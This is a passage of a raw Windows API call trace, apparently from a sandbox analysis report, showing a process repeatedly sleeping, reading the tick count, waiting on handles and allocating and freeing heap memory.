Interval=0x87fec0*=-11000000) returned 0x0 [0190.529] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.530] GetTickCount () returned 0x2190fcd [0190.530] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e65070 [0190.530] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0190.530] GetTickCount () returned 0x2190fcd [0190.530] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad24e0 [0190.530] GetTickCount () returned 0x2190fcd [0190.530] GetTickCount () returned 0x2190fcd [0190.531] GetTickCount () returned 0x2190fcd [0190.531] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad24e0 | out: hHeap=0x2150000) returned 1 [0190.531] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0190.531] GetTickCount () returned 0x2190fcd [0190.531] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad2060 [0190.531] GetTickCount () returned 0x2190fcd [0190.531] GetTickCount () returned 0x2190fcd [0190.531] GetTickCount () returned 0x2190fcd [0190.531] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad2060 | out: hHeap=0x2150000) returned 1 [0190.531] WaitForSingleObject (hHandle=0x72c, dwMilliseconds=0x0) returned 0x0 [0190.531] GetTickCount () returned 0x2190fcd [0190.531] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad24e0 [0190.531] GetTickCount () returned 0x2190fcd [0190.531] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad24e0 | out: hHeap=0x2150000) returned 1 [0190.531] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65070 | out: hHeap=0x2150000) returned 1 [0190.531] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.532] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.534] GetTickCount () returned 0x2191863 [0190.534] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64b70 [0190.534] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0190.534] GetTickCount () returned 0x2191863 [0190.534] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad2a20 [0190.534] GetTickCount () returned 0x2191863 [0190.534] GetTickCount () returned 0x2191863 [0190.534] GetTickCount () returned 0x2191863 [0190.534] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad2a20 | out: hHeap=0x2150000) returned 1 [0190.534] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0190.534] GetTickCount () returned 0x2191863 [0190.534] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad24e0 [0190.534] GetTickCount () returned 0x2191863 [0190.534] GetTickCount () returned 0x2191863 [0190.534] GetTickCount () returned 0x2191863 [0190.534] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad24e0 | out: hHeap=0x2150000) returned 1 [0190.534] WaitForSingleObject (hHandle=0x72c, dwMilliseconds=0x0) returned 0x0 [0190.534] GetTickCount () returned 0x2191863 [0190.534] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad24e0 [0190.534] GetTickCount () returned 0x2191863 [0190.534] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad24e0 | out: hHeap=0x2150000) returned 1 [0190.534] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64b70 | out: hHeap=0x2150000) returned 1 [0190.535] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.536] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.537] GetTickCount () returned 0x21920f9 [0190.537] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64bf0 [0190.537] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0190.537] GetTickCount () returned 0x21920f9 [0190.537] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad1fd0 [0190.537] GetTickCount () returned 0x21920f9 [0190.537] GetTickCount () returned 0x21920f9 [0190.538] GetTickCount () returned 0x21920f9 [0190.538] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad1fd0 | out: hHeap=0x2150000) returned 1 [0190.538] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0190.538] GetTickCount () returned 0x21920f9 [0190.538] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad24e0 [0190.538] GetTickCount () returned 0x21920f9 [0190.538] GetTickCount () returned 0x21920f9 [0190.538] GetTickCount () returned 0x21920f9 [0190.538] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad24e0 | out: hHeap=0x2150000) returned 1 [0190.538] WaitForSingleObject (hHandle=0x72c, dwMilliseconds=0x0) returned 0x0 [0190.538] GetTickCount () returned 0x21920f9 [0190.538] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad2690 [0190.538] GetTickCount () returned 0x21920f9 [0190.538] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad2690 | out: hHeap=0x2150000) returned 1 [0190.538] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64bf0 | out: hHeap=0x2150000) returned 1 [0190.538] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.539] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.541] GetTickCount () returned 0x219299f [0190.541] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64f70 [0190.541] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0190.541] GetTickCount () returned 0x219299f [0190.541] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad24e0 [0190.541] GetTickCount () returned 0x219299f [0190.541] GetTickCount () returned 0x219299f [0190.541] GetTickCount () returned 0x219299f [0190.541] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad24e0 | out: hHeap=0x2150000) returned 1 [0190.541] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0190.541] GetTickCount () returned 0x219299f [0190.541] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad2a20 [0190.541] GetTickCount () returned 0x219299f [0190.541] GetTickCount () returned 0x219299f [0190.541] GetTickCount () returned 0x219299f [0190.541] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad2a20 | out: hHeap=0x2150000) returned 1 [0190.541] WaitForSingleObject (hHandle=0x72c, dwMilliseconds=0x0) returned 0x0 [0190.541] GetTickCount () returned 0x219299f [0190.541] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad24e0 [0190.541] GetTickCount () returned 0x219299f [0190.541] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad24e0 | out: hHeap=0x2150000) returned 1 [0190.541] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64f70 | out: hHeap=0x2150000) returned 1 [0190.542] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.543] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.544] GetTickCount () returned 0x2193235 [0190.544] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64f70 [0190.544] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0190.544] GetTickCount () returned 0x2193235 [0190.544] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad2a20 [0190.544] GetTickCount () returned 0x2193235 [0190.544] GetTickCount () returned 0x2193235 [0190.544] GetTickCount () returned 0x2193235 [0190.545] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad2a20 | out: hHeap=0x2150000) returned 1 [0190.545] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0190.545] GetTickCount () returned 0x2193235 [0190.545] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad24e0 [0190.545] GetTickCount () returned 0x2193235 [0190.545] GetTickCount () returned 0x2193235 [0190.545] GetTickCount () returned 0x2193235 [0190.545] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad24e0 | out: hHeap=0x2150000) returned 1 [0190.545] WaitForSingleObject (hHandle=0x72c, dwMilliseconds=0x0) returned 0x0 [0190.545] GetTickCount () returned 0x2193235 [0190.545] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad24e0 [0190.545] GetTickCount () returned 0x2193235 [0190.545] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad24e0 | out: hHeap=0x2150000) returned 1 [0190.545] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64f70 | out: hHeap=0x2150000) returned 1 [0190.545] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.546] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.548] GetTickCount () returned 0x2193acb [0190.548] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64c30 [0190.548] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0190.548] GetTickCount () returned 0x2193acb [0190.548] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad24e0 [0190.548] GetTickCount () returned 0x2193acb [0190.548] GetTickCount () returned 0x2193acb [0190.548] GetTickCount () returned 0x2193acb [0190.548] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad24e0 | out: hHeap=0x2150000) returned 1 [0190.548] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0190.548] GetTickCount () returned 0x2193acb [0190.548] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad26c0 [0190.548] GetTickCount () returned 0x2193acb [0190.548] GetTickCount () returned 0x2193acb [0190.548] GetTickCount () returned 0x2193acb [0190.548] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad26c0 | out: hHeap=0x2150000) returned 1 [0190.548] WaitForSingleObject (hHandle=0x72c, dwMilliseconds=0x0) returned 0x0 [0190.548] GetTickCount () returned 0x2193acb [0190.548] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad24e0 [0190.548] GetTickCount () returned 0x2193acb [0190.548] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad24e0 | out: hHeap=0x2150000) returned 1 [0190.548] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64c30 | out: hHeap=0x2150000) returned 1 [0190.548] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.553] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.555] GetTickCount () returned 0x2194371 [0190.555] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64af0 [0190.555] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0190.555] GetTickCount () returned 0x2194371 [0190.555] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad24e0 [0190.555] GetTickCount () returned 0x2194371 [0190.555] GetTickCount () returned 0x2194371 [0190.555] GetTickCount () returned 0x2194371 [0190.555] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad24e0 | out: hHeap=0x2150000) returned 1 [0190.555] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0190.555] GetTickCount () returned 0x2194371 [0190.555] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad27e0 [0190.555] GetTickCount () returned 0x2194371 [0190.555] GetTickCount () returned 0x2194371 [0190.555] GetTickCount () returned 0x2194371 [0190.555] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad27e0 | out: hHeap=0x2150000) returned 1 [0190.555] WaitForSingleObject (hHandle=0x72c, dwMilliseconds=0x0) returned 0x0 [0190.555] GetTickCount () returned 0x2194371 [0190.555] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad24e0 [0190.555] GetTickCount () returned 0x2194371 [0190.555] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad24e0 | out: hHeap=0x2150000) returned 1 [0190.555] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64af0 | out: hHeap=0x2150000) returned 1 [0190.556] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.557] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.559] GetTickCount () returned 0x2194c07 [0190.559] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e65030 [0190.559] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0190.559] GetTickCount () returned 0x2194c07 [0190.559] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad2a20 [0190.559] GetTickCount () returned 0x2194c07 [0190.559] GetTickCount () returned 0x2194c07 [0190.559] GetTickCount () returned 0x2194c07 [0190.559] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad2a20 | out: hHeap=0x2150000) returned 1 [0190.559] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0190.559] GetTickCount () returned 0x2194c07 [0190.559] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad2750 [0190.559] GetTickCount () returned 0x2194c07 [0190.559] GetTickCount () returned 0x2194c07 [0190.559] GetTickCount () returned 0x2194c07 [0190.559] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad2750 | out: hHeap=0x2150000) returned 1 [0190.559] WaitForSingleObject (hHandle=0x72c, dwMilliseconds=0x0) returned 0x0 [0190.560] GetTickCount () returned 0x2194c07 [0190.560] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad27e0 [0190.560] GetTickCount () returned 0x2194c07 [0190.560] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad27e0 | out: hHeap=0x2150000) returned 1 [0190.560] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65030 | out: hHeap=0x2150000) returned 1 [0190.560] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.561] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.563] GetTickCount () returned 0x219549d [0190.563] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64bf0 [0190.563] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0190.563] GetTickCount () returned 0x219549d [0190.563] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad2a20 [0190.563] GetTickCount () returned 0x219549d [0190.563] GetTickCount () returned 0x219549d [0190.563] GetTickCount () returned 0x219549d [0190.563] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad2a20 | out: hHeap=0x2150000) returned 1 [0190.563] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0190.563] GetTickCount () returned 0x219549d [0190.563] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad2690 [0190.563] GetTickCount () returned 0x219549d [0190.563] GetTickCount () returned 0x219549d [0190.563] GetTickCount () returned 0x219549d [0190.563] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad2690 | out: hHeap=0x2150000) returned 1 [0190.563] WaitForSingleObject (hHandle=0x72c, dwMilliseconds=0x0) returned 0x0 [0190.563] GetTickCount () returned 0x219549d [0190.563] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad2a20 [0190.563] GetTickCount () returned 0x219549d [0190.563] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad2a20 | out: hHeap=0x2150000) returned 1 [0190.563] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64bf0 | out: hHeap=0x2150000) returned 1 [0190.564] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.565] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.566] GetTickCount () returned 0x2195d33 [0190.566] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64ff0 [0190.566] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0190.566] GetTickCount () returned 0x2195d33 [0190.566] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad2ab0 [0190.566] GetTickCount () returned 0x2195d33 [0190.566] GetTickCount () returned 0x2195d33 [0190.567] GetTickCount () returned 0x2195d33 [0190.567] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad2ab0 | out: hHeap=0x2150000) returned 1 [0190.567] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0190.567] GetTickCount () returned 0x2195d33 [0190.567] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad2ab0 [0190.567] GetTickCount () returned 0x2195d33 [0190.567] GetTickCount () returned 0x2195d33 [0190.567] GetTickCount () returned 0x2195d33 [0190.567] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad2ab0 | out: hHeap=0x2150000) returned 1 [0190.567] WaitForSingleObject (hHandle=0x72c, dwMilliseconds=0x0) returned 0x0 [0190.567] GetTickCount () returned 0x2195d33 [0190.567] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad24e0 [0190.567] GetTickCount () returned 0x2195d33 [0190.567] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad24e0 | out: hHeap=0x2150000) returned 1 [0190.567] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64ff0 | out: hHeap=0x2150000) returned 1 [0190.567] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.568] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.570] GetTickCount () returned 0x21965d8 [0190.570] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64f70 [0190.570] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0190.570] GetTickCount () returned 0x21965d8 [0190.570] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad2090 [0190.570] GetTickCount () returned 0x21965d8 [0190.570] GetTickCount () returned 0x21965d8 [0190.570] GetTickCount () returned 0x21965d8 [0190.570] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad2090 | out: hHeap=0x2150000) returned 1 [0190.570] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0190.570] GetTickCount () returned 0x21965d8 [0190.570] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad2690 [0190.570] GetTickCount () returned 0x21965d8 [0190.570] GetTickCount () returned 0x21965d8 [0190.570] GetTickCount () returned 0x21965d8 [0190.570] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad2690 | out: hHeap=0x2150000) returned 1 [0190.570] WaitForSingleObject (hHandle=0x72c, dwMilliseconds=0x0) returned 0x0 [0190.570] GetTickCount () returned 0x21965d8 [0190.570] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad2690 [0190.570] GetTickCount () returned 0x21965d8 [0190.570] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad2690 | out: hHeap=0x2150000) returned 1 [0190.570] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64f70 | out: hHeap=0x2150000) returned 1 [0190.571] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.572] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.573] GetTickCount () returned 0x2196e6e [0190.573] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64bf0 [0190.573] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0190.573] GetTickCount () returned 0x2196e6e [0190.573] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad2a20 [0190.573] GetTickCount () returned 0x2196e6e [0190.573] GetTickCount () returned 0x2196e6e [0190.574] GetTickCount () returned 0x2196e6e [0190.574] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad2a20 | out: hHeap=0x2150000) returned 1 [0190.574] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0190.574] GetTickCount () returned 0x2196e6e [0190.574] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad2a20 [0190.574] GetTickCount () returned 0x2196e6e [0190.574] GetTickCount () returned 0x2196e6e [0190.574] GetTickCount () returned 0x2196e6e [0190.574] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad2a20 | out: hHeap=0x2150000) returned 1 [0190.574] WaitForSingleObject (hHandle=0x72c, dwMilliseconds=0x0) returned 0x0 [0190.574] GetTickCount () returned 0x2196e6e [0190.574] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad2690 [0190.574] GetTickCount () returned 0x2196e6e [0190.574] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad2690 | out: hHeap=0x2150000) returned 1 [0190.574] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64bf0 | out: hHeap=0x2150000) returned 1 [0190.575] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.576] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.578] GetTickCount () returned 0x2197704 [0190.578] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64ff0 [0190.578] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0190.578] GetTickCount () returned 0x2197704 [0190.578] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad24e0 [0190.578] GetTickCount () returned 0x2197704 [0190.578] GetTickCount () returned 0x2197704 [0190.578] GetTickCount () returned 0x2197704 [0190.578] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad24e0 | out: hHeap=0x2150000) returned 1 [0190.578] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0190.578] GetTickCount () returned 0x2197704 [0190.578] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad2a20 [0190.578] GetTickCount () returned 0x2197704 [0190.578] GetTickCount () returned 0x2197704 [0190.578] GetTickCount () returned 0x2197704 [0190.578] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad2a20 | out: hHeap=0x2150000) returned 1 [0190.578] WaitForSingleObject (hHandle=0x72c, dwMilliseconds=0x0) returned 0x0 [0190.578] GetTickCount () returned 0x2197704 [0190.578] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad2690 [0190.578] GetTickCount () returned 0x2197704 [0190.578] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad2690 | out: hHeap=0x2150000) returned 1 [0190.579] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64ff0 | out: hHeap=0x2150000) returned 1 [0190.579] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.580] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.581] GetTickCount () returned 0x2197f9a [0190.582] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64cf0 [0190.582] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0190.582] GetTickCount () returned 0x2197f9a [0190.582] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad2a20 [0190.582] GetTickCount () returned 0x2197f9a [0190.582] GetTickCount () returned 0x2197f9a [0190.582] GetTickCount () returned 0x2197f9a [0190.582] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad2a20 | out: hHeap=0x2150000) returned 1 [0190.582] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0190.582] GetTickCount () returned 0x2197f9a [0190.582] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad2780 [0190.583] GetTickCount () returned 0x2197f9a [0190.583] GetTickCount () returned 0x2197f9a [0190.583] GetTickCount () returned 0x2197f9a [0190.583] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad2780 | out: hHeap=0x2150000) returned 1 [0190.583] WaitForSingleObject (hHandle=0x72c, dwMilliseconds=0x0) returned 0x0 [0190.583] GetTickCount () returned 0x2197f9a [0190.583] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad2a20 [0190.583] GetTickCount () returned 0x2197f9a [0190.583] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad2a20 | out: hHeap=0x2150000) returned 1 [0190.583] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64cf0 | out: hHeap=0x2150000) returned 1 [0190.583] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.585] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.588] GetTickCount () returned 0x2198840 [0190.588] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64bb0 [0190.588] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0190.588] GetTickCount () returned 0x2198840 [0190.588] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad2ab0 [0190.588] GetTickCount () returned 0x2198840 [0190.588] GetTickCount () returned 0x2198840 [0190.588] GetTickCount () returned 0x2198840 [0190.589] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad2ab0 | out: hHeap=0x2150000) returned 1 [0190.589] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0190.589] GetTickCount () returned 0x2198840 [0190.589] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad2a20 [0190.589] GetTickCount () returned 0x2198840 [0190.589] GetTickCount () returned 0x2198840 [0190.589] GetTickCount () returned 0x2198840 [0190.589] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad2a20 | out: hHeap=0x2150000) returned 1 [0190.589] WaitForSingleObject (hHandle=0x72c, dwMilliseconds=0x0) returned 0x0 [0190.589] GetTickCount () returned 0x2198840 [0190.589] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad24e0 [0190.589] GetTickCount () returned 0x2198840 [0190.589] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad24e0 | out: hHeap=0x2150000) returned 1 [0190.590] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64bb0 | out: hHeap=0x2150000) returned 1 [0190.590] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.593] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.616] GetTickCount () returned 0x21990e5 [0190.616] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64b30 [0190.616] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0190.617] GetTickCount () returned 0x21990e5 [0190.617] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad2a20 [0190.617] GetTickCount () returned 0x21990e5 [0190.617] GetTickCount () returned 0x21990e5 [0190.617] GetTickCount () returned 0x21990e5 [0190.617] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad2a20 | 